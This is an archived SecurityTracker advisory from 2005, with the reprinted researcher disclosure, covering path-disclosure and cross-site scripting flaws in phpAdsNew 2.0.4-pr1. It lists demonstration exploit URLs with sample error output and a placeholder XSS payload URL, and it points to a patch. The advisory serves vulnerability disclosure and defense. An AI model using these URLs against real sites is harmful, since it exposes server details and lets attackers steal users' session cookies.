SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


Try our Premium Alert Service
 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service





Category:   Application (Generic)  >   phpAdsNew Vendors:   phpadsnew.com
phpAdsNew 'adframe.php' Permits Cross-Site Scripting Attacks and Various Scripts Disclose the Installation Path to Remote Users
SecurityTracker Alert ID:  1013429
SecurityTracker URL:  http://securitytracker.com/id/1013429
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Mar 14 2005
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Exploit Included:  Yes  
Version(s): 2.0.4-pr1
Description:   Maksymilian Arciemowicz (cXIb8O3) of SecurityReason reported some vulnerabilities in phpAdsNew. A remote user can determine the installation path. A remote user can conduct cross-site scripting attacks.

A remote user can directly access certain library include files and other files to cause the system to display an error message that discloses the installation path. Some demonstration exploit URLs are provided:

http://[target]/[DIR]/libraries/lib-xmlrpcs.inc.php
http://[target]/[DIR]/maintenance/maintenance-activation.php
http://[target]/[DIR]/maintenance/maintenance-cleantables.php
http://[target]/[DIR]/maintenance/maintenance-autotargeting.php
http://[target]/[DIR]/maintenance/maintenance-reports.php
http://[target]/[DIR]/misc/backwards%20compatibility/phpads.php
http://[target]/[DIR]/misc/backwards%20compatibility/remotehtmlview.php
http://[target]/[DIR]/misc/backwards%20compatibility/click.php
http://[target]/[DIR]/adcontent.php

If 'regsiter_globals' is set to 'on' in the 'php.ini' configuration file, a remote user can conduct cross-site scripting attacks. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the phpAdsNew software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A demonstration exploit URL is provided:

http://[target]/[DIR]/adframe.php?refresh=securityreason.com'>[XSS code]

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the phpAdsNew software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A remote user can determine the installation path.

Solution:   No vendor solution was available at the time of this entry.

An unofficial patch is available at:

http://securityreason.com/patch/phpadsnew.0.diff

Vendor URL:  phpadsnew.com/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [SECURITYREASON.COM] phpAdsNew 2.0.4-pr1 Multiple vulnerabilities cXIb8O3.9


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[phpAdsNew 2.0.4-pr1 Multiple vulnerabilities cXIb8O3.9]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date: 13.3.2005
from securityreason.com TEAM


- --- 0.Description ---
 phpAdsNew is an open-source ad server, with an integrated banner management 
interface and tracking system for gathering statistics. With phpAdsNew you 
can easily rotate paid banners and your own in-house advertisements. You can 
even integrate banners from third party advertising companies.

- --- 1. Full Path Disclosure ---
If you can see error..

1.0
http://[HOST]/[DIR]/libraries/lib-xmlrpcs.inc.php
Error message :
- ---------------
Warning: main(phpAds_path/libraries/lib-xmlrpc.inc.php) [function.main]: 
failed to open stream: No such file or directory 
in /www/phpAdsNew-2.0.3/libraries/lib-xmlrpcs.inc.php on line 50

Fatal error: main() [function.require]: Failed opening required 
'phpAds_path/libraries/lib-xmlrpc.inc.php' (include_path='.:') 
in /www/phpAdsNew-2.0.3/libraries/lib-xmlrpcs.inc.php on line 50
- ---------------

1.1
http://[HOST]/[DIR]/maintenance/maintenance-activation.php
http://[HOST]/[DIR]/maintenance/maintenance-cleantables.php
http://[HOST]/[DIR]/maintenance/maintenance-autotargeting.php
http://[HOST]/[DIR]/maintenance/maintenance-reports.php

Error message :
- ---------------
Warning: main(phpAds_path/libraries/lib-warnings.inc.php) [function.main]: 
failed to open stream: No such file or directory 
in /www/phpAdsNew-2.0.3/maintenance/maintenance-activation.php on line 17

Fatal error: main() [function.require]: Failed opening required 
'phpAds_path/libraries/lib-warnings.inc.php' (include_path='.:') 
in /www/phpAdsNew-2.0.3/maintenance/maintenance-activation.php on line 17
- ---------------


1.2
http://[HOST]/[DIR]/misc/backwards%20compatibility/phpads.php

Error message :
- ---------------
Warning: main(adview.php) [function.main]: failed to open stream: No such file 
or directory in /www/phpAdsNew-2.0.3/misc/backwards compatibility/phpads.php 
on line 19

Warning: main() [function.include]: Failed opening 'adview.php' for inclusion 
(include_path='.:') in /www/phpAdsNew-2.0.3/misc/backwards 
compatibility/phpads.php on line 19
- ---------------


1.3
http://[HOST]/[DIR]/misc/backwards%20compatibility/remotehtmlview.php

Error message :
- ---------------
Warning: main(adjs.php) [function.main]: failed to open stream: No such file 
or directory in /www/phpAdsNew-2.0.3/misc/backwards 
compatibility/remotehtmlview.php on line 19

Warning: main() [function.include]: Failed opening 'adjs.php' for inclusion 
(include_path='.:') in /www/phpAdsNew-2.0.3/misc/backwards 
compatibility/remotehtmlview.php on line 19
- ---------------


1.4
http://[HOST]/[DIR]/misc/backwards%20compatibility/click.php

Error message :
- ---------------
Warning: main(adclick.php) [function.main]: failed to open stream: No such 
file or directory in /www/phpAdsNew-2.0.3/misc/backwards 
compatibility/click.php on line 19

Warning: main() [function.include]: Failed opening 'adclick.php' for inclusion 
(include_path='.:') in /www/phpAdsNew-2.0.3/misc/backwards 
compatibility/click.php on line 19
- ---------------


1.5
http://[HOST]/[DIR]/adcontent.php

Error message :
- ---------------
Warning: array_merge() [function.array-merge]: Argument #2 is not an array 
in /www/phpAdsNew-2.0.3/adcontent.php on line 72
- ---------------


- --- 2. Cross Site Scripting ---
If register_globals=On

http://[HOST]/[DIR]/adframe.php?refresh=securityreason.com'>[XSS code]

- --- 3. How to fix ---

Download the new version of the script or update.

http://securityreason.com/patch/phpadsnew.0.diff

- --- 4. Greets ---

sp3x and Matteo Beccati


- --- 5.Contact ---
Author: Maksymilian Arciemowicz < cXIb8O3 >
Email: max [at] jestsuper [dot] pl or cxib [at] securityreason [dot] com
securityreason.com TEAM
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (FreeBSD)

iD8DBQFCNdtxznmvyJCR4zQRApdmAJ9pefOtxqW0NNPbOUQeRl+h9MMSfwCgqyuO
I8zBDnpMyACdv61ccVKvy+s=
=aYxv
-----END PGP SIGNATURE-----
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2018, SecurityGlobal.net LLC